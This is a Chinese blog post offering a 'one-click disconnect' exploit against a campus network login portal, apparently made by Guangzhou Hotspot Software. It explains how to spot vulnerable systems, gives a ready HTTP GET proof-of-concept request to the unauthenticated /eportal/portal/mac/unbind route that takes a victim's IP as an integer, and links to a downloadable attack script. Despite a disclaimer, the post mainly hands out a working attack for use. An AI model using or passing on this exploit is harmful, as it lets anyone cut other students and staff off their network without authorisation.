校园网管理系统未授权访问一键断网漏洞（付脚本，6月3日更新）

Zaxk1337 网络安全者 2024-06-04 22:17

===================================
免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。
0x01 工具介绍
打开你的校园网认证界面，如果在任意位置你找到了包含Guangzhou Hotspot Software Technology Co., Ltd 或者 本XX系统由广州热点软件科技股份有限公司提供的Powerby信息，又或者你误打误撞发现了某个带eportal字符串的路径，
那么，你所在的校园认证系统中很有可能存在此漏洞。

0x02 安装与使用
由于未对unbind路由做验证，导致任意知道受害者内网ip地址的人员，在使用一个简易将ip地址转换为int整型数字的算法后(已附脚本，算法在脚本里面)，可以实现无授权解绑目标mac地址，实现断网效果。

POC：

GET /eportal/portal/mac/unbind?wlan_user_mac=000000000000&wlan_user_ip={ipToParseIntValue计算后的ip整数值} HTTP/1.1
Host: {把我换成你家校园网登陆ip地址}:801
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br

---

0x03 下载链接

1、通过阅读原文，到项目地址下载

2、
网盘下载
链接：
https://pan.quark.cn/s/636dbcec21af